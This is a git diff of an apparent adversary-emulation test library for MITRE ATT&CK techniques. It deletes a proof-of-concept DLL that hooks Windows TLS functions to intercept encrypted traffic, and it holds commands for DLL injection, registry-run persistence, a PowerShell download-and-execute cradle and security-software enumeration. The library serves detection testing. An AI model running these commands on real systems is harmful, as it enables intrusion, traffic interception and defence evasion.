Malware commonly utilizes process injection to access system resources through which Persistence and other environment modifications can be made. More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.</blockquote>
Detection: Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC, and those that can be used to modify memory within another process, such as WriteProcessMemory, may be used for this technique. (Citation: Engame Process Injection July 2017)
Monitoring for Linux specific calls such as the ptrace system call, the use of LD_PRELOAD environment variable, or dlfcn dynamic linking API calls, should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods. (Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits)
Monitor for named pipe creation and connection events (Event IDs 17 and 18) for possible indicators of infected processes with external modules. (Citation: Microsoft Sysmon v6 May 2017)
Monitor processes and command-line arguments for actions that could be done before or after code injection has occurred and correlate the information with related event information. Code injection may also be performed using PowerShell with tools such as PowerSploit, (Citation: Powersploit) so additional PowerShell monitoring may be required to cover known implementations of this behavior.
Platforms: Linux, macOS, Windows
Data Sources: API monitoring, Windows Registry, File monitoring, DLL monitoring, Named Pipes, Process Monitoring
Effective Permissions: User, Administrator, SYSTEM, root
Defense Bypassed: Process whitelisting, Anti-virus
Permissions Required: User, Administrator, SYSTEM, root
Contributors: Anastasios Pingios</blockquote>
## Atomic Tests
@@ -41,7 +59,7 @@ Windows 10 Utility To Inject DLLS
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dll_payload | DLL to Inject | Path | C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll|
| dll_payload | DLL to Inject | Path | T1055.dll|
| process_id | PID of input_arguments | Int | $pid|
#### Run it with `powershell`!
@@ -52,7 +70,7 @@ mavinject $pid /INJECTRUNNING #{dll_payload}
<br/>
## Atomic Test #2 - Process Injection via PowerSploit
PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-DllInjection.ps1)
PowerShell Injection
**Supported Platforms:** Windows
atomics/T1055/T1055.yaml
+2 -3
View File
@@ -14,7 +14,7 @@ atomic_tests:
dll_payload:
description: DLL to Inject
type: Path
default: C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll
default: T1055.dll
process_id:
description: PID of input_arguments
type: Int
@@ -23,10 +23,9 @@ atomic_tests:
name: powershell
command: |
mavinject $pid /INJECTRUNNING #{dll_payload}
- name: Process Injection via PowerSploit
description: |
PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-DllInjection.ps1)
PowerShell Injection
supported_platforms:
- windows
atomics/T1055/src/T1055.cpp
-147
View File
@@ -1,147 +0,0 @@
#define SECURITY_WIN32 //Define First Before Imports.
#include <windows.h>
#include <stdio.h>
#include <Sspi.h> //Be sure to reference secur32.lib in Linker | Input | Additional Dependencies
FARPROC fpEncryptMessage; //Pointer To The Original Location
BYTE bSavedByte; //Saved Byte Overwritten by 0xCC -
FARPROC fpDecryptMessage; //Pointer To The Original Location
BYTE bSavedByte2; //Saved Byte Overwritten by 0xCC -
// Original Idea/Reference Blog Post Here:
// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108
// PoC by Casey Smith @subTee
// From PowerShell
// mavinject.exe $pid /INJECTRUNNING C:\AtomicTests\AtomicSSLHookx64.dll
// curl https://www.example.com
// Should Hook and Display Request/Response from HTTPS
BOOL WriteMemory(FARPROC fpFunc, LPCBYTE b, SIZE_T size) {
DWORD dwOldProt = 0;
if (VirtualProtect(fpFunc, size, PAGE_EXECUTE_READWRITE, &dwOldProt) == FALSE) {
return FALSE;
}
MoveMemory(fpFunc, b, size);
return VirtualProtect(fpFunc, size, dwOldProt, &dwOldProt);
}
//TODO, Combine HOOK Function To take 2 params. DLL and Function Name.
VOID HookFunction(VOID) {
fpEncryptMessage = GetProcAddress(LoadLibrary(L"sspicli.dll"), "EncryptMessage");
if (fpEncryptMessage == NULL) {
return;
}
bSavedByte = *(LPBYTE)fpEncryptMessage;
const BYTE bInt3 = 0xCC;
if (WriteMemory(fpEncryptMessage, &bInt3, sizeof(BYTE)) == FALSE) {
ExitThread(0);
}
}
VOID HookFunction2(VOID) {
fpDecryptMessage = GetProcAddress(LoadLibrary(L"sspicli.dll"), "DecryptMessage");
if (fpDecryptMessage == NULL) {
return;
}
bSavedByte2 = *(LPBYTE)fpDecryptMessage;
const BYTE bInt3 = 0xCC;
if (WriteMemory(fpDecryptMessage, &bInt3, sizeof(BYTE)) == FALSE) {
ExitThread(0);
}
}
SECURITY_STATUS MyEncryptMessage(
PCtxtHandle phContext,
ULONG fQOP,
PSecBufferDesc pMessage,
ULONG MessageSeqNo
)
{
char* buffer = (char*)((DWORD_PTR)(pMessage->pBuffers->pvBuffer) + 0x29); //Just Hardcode for PoC
::MessageBoxA(NULL, buffer, "MITM Intercept", 0);
if (WriteMemory(fpEncryptMessage, &bSavedByte, sizeof(BYTE)) == FALSE) {
ExitThread(0);
}
SECURITY_STATUS SEC_EntryRet = EncryptMessage(phContext, fQOP, pMessage, MessageSeqNo);
HookFunction();
return SEC_EntryRet;
}
SECURITY_STATUS MyDecryptMessage(
PCtxtHandle phContext,
PSecBufferDesc pMessage,
ULONG MessageSeqNo,
ULONG fQOP
)
{
if (WriteMemory(fpDecryptMessage, &bSavedByte2, sizeof(BYTE)) == FALSE) {
ExitThread(0);
}
SECURITY_STATUS SEC_EntryRet = DecryptMessage(phContext, pMessage, MessageSeqNo, &fQOP );
char* buffer = (char*)(pMessage->pBuffers->pvBuffer);
::MessageBoxA(NULL, buffer, "MITM Intercept", 0);
HookFunction2();
return SEC_EntryRet;
}
LONG WINAPI
MyVectoredExceptionHandler1(
struct _EXCEPTION_POINTERS *ExceptionInfo
)
{
UNREFERENCED_PARAMETER(ExceptionInfo);
#ifdef _WIN64
if (ExceptionInfo->ContextRecord->Rip == (DWORD_PTR)fpEncryptMessage) {
ExceptionInfo->ContextRecord->Rip = (DWORD_PTR)MyEncryptMessage;
}
if (ExceptionInfo->ContextRecord->Rip == (DWORD_PTR)fpDecryptMessage) {
ExceptionInfo->ContextRecord->Rip = (DWORD_PTR)MyDecryptMessage;
}
#else
if (ExceptionInfo->ContextRecord->Eip == (DWORD_PTR)fpEncryptMessage) {
ExceptionInfo->ContextRecord->Eip = (DWORD_PTR)MyEncryptMessage;
}
if (ExceptionInfo->ContextRecord->Eip == (DWORD_PTR)fpDecryptMessage) {
ExceptionInfo->ContextRecord->Eip = (DWORD_PTR)MyDecryptMessage;
}
#endif
return EXCEPTION_CONTINUE_SEARCH;
}
BOOL APIENTRY DllMain(HANDLE hInstance, DWORD fdwReason, LPVOID lpReserved) {
switch (fdwReason) {
case DLL_PROCESS_ATTACH:
AddVectoredExceptionHandler(1, (PVECTORED_EXCEPTION_HANDLER)MyVectoredExceptionHandler1);
HookFunction();
HookFunction2();
::MessageBoxA(NULL, "Locked and Loaded!", "Boom!", 0);
break;
}
return TRUE;
}
atomics/T1056/T1056.md
+15 -3
View File
@@ -1,12 +1,24 @@
# T1056 - Input Capture
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1056)
<blockquote>Adversaries can use methods of capturing user input for obtaining credentials for [Valid Accounts](https://attack.mitre.org/techniques/T1078) and information Collection that include keylogging and user input field interception.
<blockquote>Adversaries can use methods of capturing user input for obtaining credentials for Valid Accounts and information Collection that include keylogging and user input field interception.
Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes, (Citation: Adventures of a Keystroke) but other methods exist to target information for specific purposes, such as performing a UAC prompt or wrapping the Windows default credential provider. (Citation: Wrightson 2012)
Keylogging is likely to be used to acquire credentials for new access opportunities when [Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to remain passive on a system for a period of time before an opportunity arises.
Keylogging is likely to be used to acquire credentials for new access opportunities when Credential Dumping efforts are not effective, and may require an adversary to remain passive on a system for a period of time before an opportunity arises.
Adversaries may also install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service. (Citation: Volexity Virtual Private Keylogging)</blockquote>
Adversaries may also install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through External Remote Services and Valid Accounts or as part of the initial compromise by exploitation of the externally facing web service. (Citation: Volexity Virtual Private Keylogging)
Detection: Keyloggers may take many forms, possibly involving modification to the Registry and installation of a driver, setting a hook, or polling to intercept keystrokes. Commonly used API calls include SetWindowsHook, GetKeyState, and GetAsynceyState. (Citation: Adventures of a Keystroke) Monitor the Registry and file system for such changes and detect driver installs, as well as looking for common keylogging API calls. API calls alone are not an indicator of keylogging, but may provide behavioral data that is useful when combined with other information such as new files written to disk and unusual processes.
Monitor the Registry for the addition of a Custom Credential Provider. (Citation: Wrightson 2012) Detection of compromised Valid Accounts in use by adversaries may help to catch the result of user input interception if new techniques are used.
Platforms: Linux, macOS, Windows
Data Sources: Windows Registry, Kernel drivers, Process monitoring, API monitoring
Permissions Required: Administrator, SYSTEM
Contributors: John Lambert, Microsoft Threat Intelligence Center</blockquote>
## Atomic Tests
atomics/T1057/T1057.md
+16 -4
View File
@@ -2,13 +2,25 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1057)
<blockquote>Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network.
### Windows
===Windows===
An example command that would obtain details on processes is "tasklist" using the [Tasklist](https://attack.mitre.org/software/S0057) utility.
An example command that would obtain details on processes is "tasklist" using the Tasklist utility.
### Mac and Linux
===Mac and Linux===
In Mac and Linux, this is accomplished with the <code>ps</code> command.</blockquote>
In Mac and Linux, this is accomplished with the <code>ps</code> command.
Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Normal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
Platforms: Linux, macOS, Windows
Data Sources: Process command-line parameters, Process monitoring
Permissions Required: User, Administrator, SYSTEM
System Requirements: Administrator, SYSTEM may provide better process ownership details</blockquote>
## Atomic Tests
atomics/T1059/T1059.md
+12 -2
View File
@@ -1,8 +1,18 @@
# T1059 - Command-Line Interface
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1059)
<blockquote>Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms. (Citation: Wikipedia Command-Line Interface) One example command-line interface on Windows systems is [cmd](https://attack.mitre.org/software/S0106), which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. [Scheduled Task](https://attack.mitre.org/techniques/T1053)).
<blockquote>Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms. (Citation: Wikipedia Command-Line Interface) One example command-line interface on Windows systems is cmd, which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. Scheduled Task).
Adversaries may use command-line interfaces to interact with systems and execute other software during the course of an operation.</blockquote>
Adversaries may use command-line interfaces to interact with systems and execute other software during the course of an operation.
Detection: Command-line interface activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools.
Platforms: Linux, Windows, macOS
Data Sources: Process command-line parameters, Process monitoring
Permissions Required: Administrator, SYSTEM, User
Remote Support: No</blockquote>
## Atomic Tests
atomics/T1060/T1060.md
+11 -18
View File
@@ -1,22 +1,18 @@
# T1060 - Registry Run Keys / Startup Folder
# T1060 - Registry Run Keys / Start Folder
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1060)
<blockquote>Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
<blockquote>Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) The program will be executed under the context of the user and will have the account's associated permissions level.
The following run keys are created by default on Windows systems:
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</code>
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce</code>
* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run</code>
* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce</code>
Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use Masquerading to make the Registry entries look as if they are associated with legitimate programs.
The <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx</code> is also available but is not created by default on Windows Visa and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: <code>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"</code> (Citation: Oddvar Moe RunOnceEx Mar 2018)
Detection: Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.
The following Registry keys can be used to set startup folder items for persistence:
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code>
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code>
* <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code>
* <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code>
Changes to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.</blockquote>
Platforms: Windows
Data Sources: Windows Registry, File monitoring
Permissions Required: User, Administrator</blockquote>
## Atomic Tests
@@ -45,7 +41,6 @@ Run Key Persistence
#### Run it with `command_prompt`!
```
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f
```
<br/>
<br/>
@@ -64,7 +59,6 @@ RunOnce Key Persistence
#### Run it with `command_prompt`!
```
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}"
REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f
```
<br/>
<br/>
@@ -83,8 +77,7 @@ RunOnce Key Persistence via PowerShell
#### Run it with `powershell`!
```
$RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat`")"'
```
<br/>
<br/>
atomics/T1060/T1060.yaml
+1 -4
View File
@@ -20,7 +20,6 @@ atomic_tests:
name: command_prompt
command: |
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f
- name: Reg Key RunOnce
description: |
RunOnce Key Persistence
@@ -38,7 +37,6 @@ atomic_tests:
name: command_prompt
command: |
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}"
REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f
- name: PowerShell Registry RunOnce
description: |
RunOnce Key Persistence via PowerShell
@@ -56,8 +54,7 @@ atomic_tests:
name: powershell
command: |
$RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat`")"'
- name: Startup Folder
description: |
Add Shortcut To Startup via PowerShell
atomics/T1062/T1062.md
+9 -1
View File
@@ -1,6 +1,14 @@
# T1062 - Hypervisor
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1062)
<blockquote>A type-1 hypervisor is a software layer that sits between the guest operating systems and system's hardware. (Citation: Wikipedia Hypervisor) It presents a virtual running environment to an operating system. An example of a common hypervisor is Xen. (Citation: Wikipedia Xen) A type-1 hypervisor operates at a level below the operating system and could be designed with [Rootkit](https://attack.mitre.org/techniques/T1014) functionality to hide its existence from the guest operating system. (Citation: Myers 2007) A malicious hypervisor of this nature could be used to persist on systems through interruption.</blockquote>
<blockquote>A type-1 hypervisor is a software layer that sits between the guest operating systems and system's hardware. (Citation: Wikipedia Hypervisor) It presents a virtual running environment to an operating system. An example of a common hypervisor is Xen. (Citation: Wikipedia Xen) A type-1 hypervisor operates at a level below the operating system and could be designed with Rootkit functionality to hide its existence from the guest operating system. (Citation: Myers 2007) A malicious hypervisor of this nature could be used to persist on systems through interruption.
Detection: Type-1 hypervisors may be detected by performing timing analysis. Hypervisors emulate certain CPU instructions that would normally be executed by the hardware. If an instruction takes orders of magnitude longer to execute than normal on a system that should not contain a hypervisor, one may be present. (Citation: virtualization.info 2006)
Platforms: Windows
Data Sources: System calls
Permissions Required: Administrator, SYSTEM</blockquote>
## Atomic Tests
atomics/T1063/T1063.md
+18 -23
View File
@@ -2,13 +2,23 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1063)
<blockquote>Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules, anti-virus, and virtualization. These checks may be built into early-stage remote access tools.
### Windows
===Windows===
Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), <code>reg query</code> with [Reg](https://attack.mitre.org/software/S0075), <code>dir</code> with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for.
Example commands that can be used to obtain security software information are netsh, <code>reg query</code> with Reg, <code>dir</code> with cmd, and Tasklist, but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for.
### Mac
===Mac===
It's becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.</blockquote>
It's becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.
Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
Platforms: macOS, Windows
Data Sources: File monitoring, Process command-line parameters, Process monitoring
Permissions Required: User, Administrator, SYSTEM</blockquote>
## Atomic Tests
@@ -18,8 +28,6 @@ It's becoming more common to see macOS malware perform checks for LittleSnitch a
- [Atomic Test #3 - Security Software Discovery - ps](#atomic-test-3---security-software-discovery---ps)
- [Atomic Test #4 - Security Software Discovery - Sysmon Service](#atomic-test-4---security-software-discovery---sysmon-service)
<br/>
@@ -49,10 +57,10 @@ Methods to identify Security Software on an endpoint
#### Run it with `powershell`!
```
get-process | ?{$_.Description -like "*virus*"}
get-process | ?{$_.Description -like "*carbonblack*"}
get-process | ?{$_.Description -like "*defender*"}
get-process | ?{$_.Description -like "*cylance*"}
powershell.exe get-process | ?{$_.Description -like "*virus*"}
powershell.exe get-process | ?{$_.Description -like "*carbonblack*"}
powershell.exe get-process | ?{$_.Description -like "*defender*"}
powershell.exe get-process | ?{$_.Description -like "*cylance*"}
```
<br/>
<br/>
@@ -69,16 +77,3 @@ ps -ef | grep Little\ Snitch | grep -v grep
ps aux | grep CbOsxSensorService
```
<br/>
<br/>
## Atomic Test #4 - Security Software Discovery - Sysmon Service
Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed).
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
fltmc.exe | findstr.exe 385201
```
<br/>
atomics/T1063/T1063.yaml
+4 -16
View File
@@ -30,10 +30,10 @@ atomic_tests:
executor:
name: powershell
command: |
get-process | ?{$_.Description -like "*virus*"}
get-process | ?{$_.Description -like "*carbonblack*"}
get-process | ?{$_.Description -like "*defender*"}
get-process | ?{$_.Description -like "*cylance*"}
powershell.exe get-process | ?{$_.Description -like "*virus*"}
powershell.exe get-process | ?{$_.Description -like "*carbonblack*"}
powershell.exe get-process | ?{$_.Description -like "*defender*"}
powershell.exe get-process | ?{$_.Description -like "*cylance*"}
- name: Security Software Discovery - ps
description: |
@@ -48,15 +48,3 @@ atomic_tests:
command: |
ps -ef | grep Little\ Snitch | grep -v grep
ps aux | grep CbOsxSensorService
- name: Security Software Discovery - Sysmon Service
description: |
Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed).
supported_platforms:
- windows
executor:
name: command_prompt
command: |
fltmc.exe | findstr.exe 385201
atomics/T1064/T1064.md
-29
View File
@@ -1,29 +0,0 @@
# T1064 - Scripting
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1064)
<blockquote>Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.
Scripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on macos being allowed or that the user will accept to activate them.
Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. (Citation: Metasploit) (Citation: Metasploit), (Citation: Veil) (Citation: Veil), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)</blockquote>
## Atomic Tests
- [Atomic Test #1 - Create and Execute Bash Shell Script](#atomic-test-1---create-and-execute-bash-shell-script)
<br/>
## Atomic Test #1 - Create and Execute Bash Shell Script
Creates and executes a simple bash script.
**Supported Platforms:** macOS, Linux
#### Run it with `sh`!
```
sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
sh -c "echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh"
chmod +x /tmp/art.sh
sh /tmp/art.sh
```
<br/>
atomics/T1064/T1064.yaml
-20
View File
@@ -1,20 +0,0 @@
---
attack_technique: T1064
display_name: Scripting
atomic_tests:
- name: Create and Execute Bash Shell Script
description: |
Creates and executes a simple bash script.
supported_platforms:
- macos
- linux
executor:
name: sh
command: |
sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
sh -c "echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh"
chmod +x /tmp/art.sh
sh /tmp/art.sh
atomics/T1065/T1065.md
+13 -5
View File
@@ -1,6 +1,14 @@
# T1065 - Uncommonly Used Port
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1065)
<blockquote>Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured.</blockquote>
<blockquote>Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured.
Detection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)
Platforms: Linux, macOS, Windows
Data Sources: Netflow/Enclave netflow, Process use of network, Process monitoring
Requires Network: Yes</blockquote>
## Atomic Tests
@@ -21,11 +29,11 @@ Testing uncommonly used port utilizing PowerShell
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| port | Specify uncommon port number | String | 8081|
| domain | Specify target hostname | String | google.com|
| hostname | Specify target hostname | String | google.com|
#### Run it with `powershell`!
```
test-netconnection -ComputerName #{domain} -port #{port}
test-netconnection -ComputerName #{hostname} -port #{port}
```
<br/>
<br/>
@@ -40,10 +48,10 @@ Testing uncommonly used port utilizing telnet.
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| port | Specify uncommon port number | String | 8081|
| domain | Specify target hostname | String | google.com|
| hostname | Specify target hostname | String | google.com|
#### Run it with `sh`!
```
telnet #{domain} #{port}
telnet #{hostname} #{port}
```
<br/>
atomics/T1065/T1065.yaml
+7 -6
View File
@@ -14,8 +14,8 @@ atomic_tests:
port:
description: Specify uncommon port number
type: String
default: "8081"
domain:
default: 8081
hostname:
description: Specify target hostname
type: String
default: google.com
@@ -23,7 +23,7 @@ atomic_tests:
executor:
name: powershell
command: |
test-netconnection -ComputerName #{domain} -port #{port}
test-netconnection -ComputerName #{hostname} -port #{port}
- name: Testing usage of uncommonly used port
description: |
@@ -37,8 +37,8 @@ atomic_tests:
port:
description: Specify uncommon port number
type: String
default: "8081"
domain:
default: 8081
hostname:
description: Specify target hostname
type: String
default: google.com
@@ -46,4 +46,5 @@ atomic_tests:
executor:
name: sh
command: |
telnet #{domain} #{port}
telnet #{hostname} #{port}
atomics/T1069/T1069.md
+15 -42
View File
@@ -2,26 +2,32 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1069)
<blockquote>Adversaries may attempt to find local system or domain-level groups and permissions settings.
### Windows
===Windows===
Examples of commands that can list groups are <code>net group /domain</code> and <code>net localgroup</code> using the [Net](https://attack.mitre.org/software/S0039) utility.
Examples of commands that can list groups are <code>net group /domain</code> and <code>net localgroup</code> using the Net utility.
### Mac
===Mac===
On Mac, this same thing can be accomplished with the <code>dscacheutil -q group</code> for the domain, or <code>dscl . -list /Groups</code> for local groups.
### Linux
===Linux===
On Linux, local groups can be enumerated with the <code>groups</code> command and domain groups via the <code>ldapsearch</code> command.</blockquote>
On Linux, local groups can be enumerated with the <code>groups</code> command and domain groups via the <code>ldapsearch</code> command.
Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
Platforms: Linux, Windows, macOS
Data Sources: API monitoring, Process command-line parameters, Process monitoring
Permissions Required: User</blockquote>
## Atomic Tests
- [Atomic Test #1 - Permission Groups Discovery](#atomic-test-1---permission-groups-discovery)
- [Atomic Test #2 - Permission Groups Discovery Windows](#atomic-test-2---permission-groups-discovery-windows)
- [Atomic Test #3 - Permission Groups Discovery PowerShell](#atomic-test-3---permission-groups-discovery-powershell)
<br/>
@@ -38,36 +44,3 @@ dscl . -list /Groups
groups
```
<br/>
<br/>
## Atomic Test #2 - Permission Groups Discovery Windows
Permission Groups Discovery for Windows
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
net localgroup
net group /domain
```
<br/>
<br/>
## Atomic Test #3 - Permission Groups Discovery PowerShell
Permission Groups Discovery utilizing PowerShell
